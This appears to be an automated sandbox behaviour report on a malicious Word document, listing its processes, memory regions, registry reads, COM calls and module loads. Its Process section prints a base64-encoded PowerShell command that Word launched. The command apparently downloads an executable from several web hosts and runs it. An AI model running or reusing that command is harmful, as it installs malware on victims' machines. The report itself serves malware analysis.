e6ba4bd149bfa84ab57c7926c7635e162e459d0e9e419bb3c8d8af8e41c043c9 (SHA256)
sample.doc
Word Document
Created at 2019-02-21 17:24:00
Notifications (1/1)
The operating system was rebooted during the analysis.
Monitored Processes
Behavior Information - Grouped by Category
Process #1: winword.exe
274
0
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\program files\microsoft office\root\office16\winword.exe |
| Command Line | "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:38, Reason: Analysis Target |
| Unmonitor | End Time: 00:02:14, Reason: Self Terminated |
| Monitor Duration | 00:01:36 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8dc |
| Parent PID | 0x460 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
970
0x
96C
0x
968
0x
964
0x
950
0x
940
0x
93C
0x
938
0x
934
0x
930
0x
92C
0x
928
0x
924
0x
920
0x
91C
0x
918
0x
914
0x
8F4
0x
8F0
0x
8EC
0x
8E8
0x
8E4
0x
8E0
0x
980
0x
A44
0x
AF0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00020fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x0012ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00133fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000140000 | 0x00140000 | 0x00143fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00150000 | 0x001b6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001d0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001e0000 | 0x001e0000 | 0x001e0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x001fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000200000 | 0x00200000 | 0x00206fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000210000 | 0x00210000 | 0x00211fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x00220fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x00230fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000240000 | 0x00240000 | 0x00241fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000250000 | 0x00250000 | 0x00251fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000260000 | 0x00260000 | 0x00262fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000270000 | 0x00270000 | 0x00271fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x0028ffff | Private Memory | - |
|
|
|
- |
| pagefile_0x0000000000290000 | 0x00290000 | 0x00292fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x002a2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x003affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x004affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004b0000 | 0x004b0000 | 0x00637fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000640000 | 0x00640000 | 0x007c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007d0000 | 0x007d0000 | 0x01bcffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01bd0000 | 0x01e9efff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000001ea0000 | 0x01ea0000 | 0x02292fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000022a0000 | 0x022a0000 | 0x0239ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000023a0000 | 0x023a0000 | 0x023a2fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000023b0000 | 0x023b0000 | 0x023b2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000023c0000 | 0x023c0000 | 0x023cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000023d0000 | 0x023d0000 | 0x025cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000025d0000 | 0x025d0000 | 0x025d2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000025e0000 | 0x025e0000 | 0x0261ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000026a0000 | 0x026a0000 | 0x026a0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000026b0000 | 0x026b0000 | 0x026bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000026c0000 | 0x026c0000 | 0x0273ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002740000 | 0x02740000 | 0x0281efff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002820000 | 0x02820000 | 0x02824fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000002830000 | 0x02830000 | 0x02830fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000002840000 | 0x02840000 | 0x02841fff | Pagefile Backed Memory | r |
|
|
|
- |
| index.dat | 0x02850000 | 0x0285bfff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000002860000 | 0x02860000 | 0x0295ffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x02960000 | 0x02a1ffff | Memory Mapped File | rw |
|
|
|
- |
| index.dat | 0x02a90000 | 0x02a97fff | Memory Mapped File | rw |
|
|
|
- |
| index.dat | 0x02aa0000 | 0x02aaffff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x0000000002ab0000 | 0x02ab0000 | 0x02ab0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002ac0000 | 0x02ac0000 | 0x02ac0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002ad0000 | 0x02ad0000 | 0x02ad0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002ae0000 | 0x02ae0000 | 0x02aeffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002af0000 | 0x02af0000 | 0x02af0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002b00000 | 0x02b00000 | 0x02bfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c00000 | 0x02c00000 | 0x02c00fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002c10000 | 0x02c10000 | 0x02c10fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002c20000 | 0x02c20000 | 0x02c21fff | Pagefile Backed Memory | r |
|
|
|
- |
| msxml6r.dll | 0x02c30000 | 0x02c30fff | Memory Mapped File | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000018.db | 0x02c40000 | 0x02c5ffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002c60000 | 0x02c60000 | 0x02c60fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000002c70000 | 0x02c70000 | 0x02c71fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002d80000 | 0x02d80000 | 0x02d80fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002d90000 | 0x02d90000 | 0x02e0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002e20000 | 0x02e20000 | 0x02e21fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002e30000 | 0x02e30000 | 0x02eaffff | Private Memory | rw |
|
|
|
- |
| segoeui.ttf | 0x02eb0000 | 0x02f2efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002f30000 | 0x02f30000 | 0x0302ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003030000 | 0x03030000 | 0x0312ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003130000 | 0x03130000 | 0x03130fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003150000 | 0x03150000 | 0x0324ffff | Private Memory | rw |
|
|
|
- |
| c_1255.nls | 0x03250000 | 0x03260fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000032b0000 | 0x032b0000 | 0x033affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000033b0000 | 0x033b0000 | 0x037affff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000037b0000 | 0x037b0000 | 0x038affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000038d0000 | 0x038d0000 | 0x038dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000038e0000 | 0x038e0000 | 0x039dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003a80000 | 0x03a80000 | 0x03b7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003ba0000 | 0x03ba0000 | 0x03c1ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000003c20000 | 0x03c20000 | 0x0401ffff | Private Memory | rw |
|
|
|
- |
| tahoma.ttf | 0x04020000 | 0x040cafff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004100000 | 0x04100000 | 0x041fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004280000 | 0x04280000 | 0x0437ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004380000 | 0x04380000 | 0x04b7ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000004cc0000 | 0x04cc0000 | 0x05002fff | Pagefile Backed Memory | r |
|
|
|
- |
| staticcache.dat | 0x05010000 | 0x0593ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000005940000 | 0x05940000 | 0x05a3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005a90000 | 0x05a90000 | 0x05b0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005b10000 | 0x05b10000 | 0x05c0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005c10000 | 0x05c10000 | 0x05c1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005c40000 | 0x05c40000 | 0x05d3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005d40000 | 0x05d40000 | 0x05d4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005d70000 | 0x05d70000 | 0x05e6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005e70000 | 0x05e70000 | 0x05f6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005fa0000 | 0x05fa0000 | 0x0609ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000060a0000 | 0x060a0000 | 0x0619ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006230000 | 0x06230000 | 0x0632ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006360000 | 0x06360000 | 0x063dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006410000 | 0x06410000 | 0x0650ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006510000 | 0x06510000 | 0x0660ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006720000 | 0x06720000 | 0x0681ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006850000 | 0x06850000 | 0x0694ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006950000 | 0x06950000 | 0x0714ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000007150000 | 0x07150000 | 0x0814ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000008270000 | 0x08270000 | 0x082effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000083b0000 | 0x083b0000 | 0x0842ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000008430000 | 0x08430000 | 0x0882ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000008830000 | 0x08830000 | 0x08c30fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000008c40000 | 0x08c40000 | 0x09040fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000009050000 | 0x09050000 | 0x09450fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000009460000 | 0x09460000 | 0x0965ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000009660000 | 0x09660000 | 0x0a660fff | Private Memory | rw |
|
|
|
- |
| private_0x000000000a670000 | 0x0a670000 | 0x0aa6ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000374f0000 | 0x374f0000 | 0x374fffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000037620000 | 0x37620000 | 0x3762ffff | Private Memory | rwx |
|
|
|
- |
| osppc.dll | 0x74f60000 | 0x74f92fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x773c0000 | 0x774defff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x774e0000 | 0x775d9fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x777a0000 | 0x777a6fff | Memory Mapped File | rwx |
|
|
|
- |
| normaliz.dll | 0x777b0000 | 0x777b2fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| winword.exe | 0x13fc90000 | 0x13fe6bfff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000007febd6d0000 | 0x7febd6d0000 | 0x7febd6dffff | Private Memory | rwx |
|
|
|
- |
| private_0x000007febefc0000 | 0x7febefc0000 | 0x7febefcffff | Private Memory | rwx |
|
|
|
- |
| ivy.dll | 0x7fee4400000 | 0x7fee4654fff | Memory Mapped File | rwx |
|
|
|
- |
| chart.dll | 0x7fee4660000 | 0x7fee5435fff | Memory Mapped File | rwx |
|
|
|
- |
| adal.dll | 0x7fee5440000 | 0x7fee5559fff | Memory Mapped File | rwx |
|
|
|
- |
| msptls.dll | 0x7fee5560000 | 0x7fee56d3fff | Memory Mapped File | rwx |
|
|
|
- |
| riched20.dll | 0x7fee56e0000 | 0x7fee597afff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x7fee5ab0000 | 0x7fee5b48fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x7fee5b50000 | 0x7fee5bbefff | Memory Mapped File | rwx |
|
|
|
- |
| dwrite.dll | 0x7fee5bc0000 | 0x7fee5d3dfff | Memory Mapped File | rwx |
|
|
|
- |
| d3d10warp.dll | 0x7fee5d40000 | 0x7fee5f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| msointl.dll | 0x7fee5f10000 | 0x7fee60acfff | Memory Mapped File | rwx |
|
|
|
- |
| wwintl.dll | 0x7fee60b0000 | 0x7fee616ffff | Memory Mapped File | rwx |
|
|
|
- |
| msores.dll | 0x7fee6170000 | 0x7feea556fff | Memory Mapped File | rwx |
|
|
|
- |
| mso99lres.dll | 0x7feea560000 | 0x7feeb254fff | Memory Mapped File | rwx |
|
|
|
- |
| mso40uires.dll | 0x7feeb260000 | 0x7feeb69cfff | Memory Mapped File | rwx |
|
|
|
- |
| d2d1.dll | 0x7feeb6a0000 | 0x7feeb781fff | Memory Mapped File | rwx |
|
|
|
- |
| mso.dll | 0x7feeb790000 | 0x7feed1bbfff | Memory Mapped File | rwx |
|
|
|
- |
| mso98win32client.dll | 0x7feed1c0000 | 0x7feede66fff | Memory Mapped File | rwx |
|
|
|
- |
| mso50win32client.dll | 0x7feede70000 | 0x7feedefafff | Memory Mapped File | rwx |
|
|
|
- |
| mso40uiwin32client.dll | 0x7feedf00000 | 0x7feee9cefff | Memory Mapped File | rwx |
|
|
|
- |
| mso30win32client.dll | 0x7feee9d0000 | 0x7feef0b3fff | Memory Mapped File | rwx |
|
|
|
- |
| oart.dll | 0x7feef0c0000 | 0x7fef0044fff | Memory Mapped File | rwx |
|
|
|
- |
| wwlib.dll | 0x7fef0050000 | 0x7fef2828fff | Memory Mapped File | rwx |
|
|
|
- |
| mlang.dll | 0x7fef29e0000 | 0x7fef2a1afff | Memory Mapped File | rwx |
|
|
|
- |
| mso20win32client.dll | 0x7fef2a60000 | 0x7fef2f02fff | Memory Mapped File | rwx |
|
|
|
- |
| d3d11.dll | 0x7fef2f10000 | 0x7fef2fd5fff | Memory Mapped File | rwx |
|
|
|
- |
|
For performance reasons, the remaining 287 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Host Behavior
COM (12)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | WBEMLocator | IWbemLocator | cls_context = CLSCTX_INPROC_SERVER |
|
2 | |
| Create | WbemDefaultPathParser | IWbemPath | cls_context = CLSCTX_INPROC_SERVER |
|
8 | |
| Execute | WBEMLocator | IWbemLocator | method_name = ConnectServer, network_resource = \\.\root\cimv2 |
|
1 | |
| Execute | WBEMLocator | IWbemLocator | method_name = ConnectServer, network_resource = \\.\root\cimv2 |
|
1 |
Registry (55)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\Licenses | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\409 | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\9 | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting | - |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7 | data = } |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = RequireDeclaration, data = 223, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = CompileOnDemand, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = NotifyUserBeforeStateLoss, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = BackGroundCompile, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = BreakOnAllErrors, data = 255, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = BreakOnServerErrors, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 | data = C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB |
|
2 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 | data = C:\Windows\system32\stdole2.tlb |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 | data = C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = VbaCapability, data = 255 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting | value_name = Default Impersonation Level, data = 3 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting | value_name = Default Namespace |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting | value_name = Default Namespace, data = 114 |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | powersheLl -e JAB3ADcANgA2ADQAMgA4AD0AKAAnAFYAOAAnACsAJwBfADIAJwArACcANAA1ACcAKQA7ACQAUgAwAF8AXwAyADIANgAxAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFYAMAAzAF8AMAA2ADUAXwA9ACgAJwBoAHQAdABwADoALwAnACsAJwAvAG4AZQB1AG0AYQB0AGkAJwArACcAYwBvACcAKwAnAHMAdQAnACsAJwB0AGkAbABpAHoAYQBkACcAKwAnAG8AJwArACcAcwAuACcAKwAnAGMAbwBtAC8AMQBUACcAKwAnAEkAOAAxACcAKwAnAFAAUgBRAEwATwBSAFIAQAAnACsAJwBoAHQAdAAnACsAJwBwADoALwAvAHcAaAAnACsAJwBpAHMAawB5AHMAaABpAHAAcAAnACsAJwBlAHIALgBjAG8AbQAvAHcAcAAnACsAJwAtACcAKwAnAGMAbwBuAHQAZQBuAHQALwAnACsAJwBBADgAQgBSACcAKwAnAFMAOQAnACsAJwBzAEwAJwArACcAbAA4ACcAKwAnAGkAXwBQADgARAAnACsAJwBCAHMATABoAG8AQABoAHQAdABwACcAKwAnADoALwAvACcAKwAnAGcAZQBlACcAKwAnAHMAdABkACcAKwAnAHIAJwArACcAaQBmAHQAbgB1AC4AYwAnACsAJwBvAG0ALwBnAHEAWAAnACsAJwBiADMAZwAnACsAJwBoAGsAJwArACcAUgBaAEoANgB0ACcAKwAnAGoATAA4AF8AWQBAAGgAdAB0ACcAKwAnAHAAJwArACcAOgAvAC8AbQAnACsAJwBhAHQAJwArACcAZQB4AC4AJwArACcAYgBpAHoALwAvAFIAJwArACcAUQBSADAAJwArACcAUgBhAG8AaABpAFIAXwBQAEAAaAB0AHQAJwArACcAcAA6ACcAKwAnAC8ALwBiACcAKwAnAGUAZQBwACcAKwAnAG0AJwArACcAZQAnACsAJwAuAGUAdQAvAE8AdAAnACsAJwB3AG4AcwBlAHUATQBpAFEAZQB0AGYAQgAnACsAJwBzACcAKQAuAFMAcABsAGkAdAAoACcAQAAnACkAOwAkAEEANgBfADAANgA3AD0AKAAnAG4AXwAnACsAJwAyADIAJwArACcAXwBfACcAKQA7ACQAawA5AF8AMwAwADAAXwAwACAAPQAgACgAJwA2ADIAJwArACcAOQAnACkAOwAkAEsANABfADMAMgAzAF8AOQA9ACgAJwBSACcAKwAnAF8ANwA5AF8AXwAnACsAJwA3ACcAKQA7ACQAaQA2ADUANwAzADQAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAGsAOQBfADMAMAAwAF8AMAArACgAJwAuACcAKwAnAGUAeABlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAFEAXwA2ADkANQA1ADEAMwAgAGkAbgAgACQAVgAwADMAXwAwADYANQBfACkAewB0AHIAeQB7ACQAUgAwAF8AXwAyADIANgAxAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFEAXwA2ADkANQA1ADEAMwAsACAAJABpADYANQA3ADMANAApADsAJABpADAAOQAxAF8ANgA4AD0AKAAnAFUAOQAnACsAJwA5AF8AXwA3ACcAKwAnADEAJwApADsASQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAaQA2ADUANwAzADQAKQAuAGwAZQBuAGcAdABoACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABpADYANQA3ADMANAA7ACQAegBfADMAXwAxADYAXwAyAD0AKAAnAFYAMwAnACsAJwAzACcAKwAnADQAMQA0ACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABmADQAXwBfADkAMQA5ADQAPQAoACcAVQAyADEAOQBfACcAKwAnAF8AJwArACcAOABfACcAKQA7AA== | - |
|
1 |
Module (149)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | Comctl32.dll | base_address = 0x7fefc030000 |
|
1 | |
| Load | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL | base_address = 0x7fee37d0000 |
|
1 | |
| Load | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\1033\VBE7INTL.DLL | base_address = 0x7fef30d0000 |
|
1 | |
| Load | OLEAUT32.DLL | base_address = 0x7feff380000 |
|
1 | |
| Load | VBE7.DLL | base_address = 0x7fee3fb0000 |
|
6 | |
| Load | C:\Windows\system32\advapi32.dll | base_address = 0x7fefed90000 |
|
1 | |
| Get Handle | c:\program files\microsoft office\root\office16\winword.exe | base_address = 0x13fc90000 |
|
1 | |
| Get Handle | MSI.DLL | base_address = 0x7fef9a00000 |
|
1 | |
| Get Handle | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\system32\user32.dll | base_address = 0x774e0000 |
|
1 | |
| Get Handle | oleaut32.dll | base_address = 0x7feff380000 |
|
1 | |
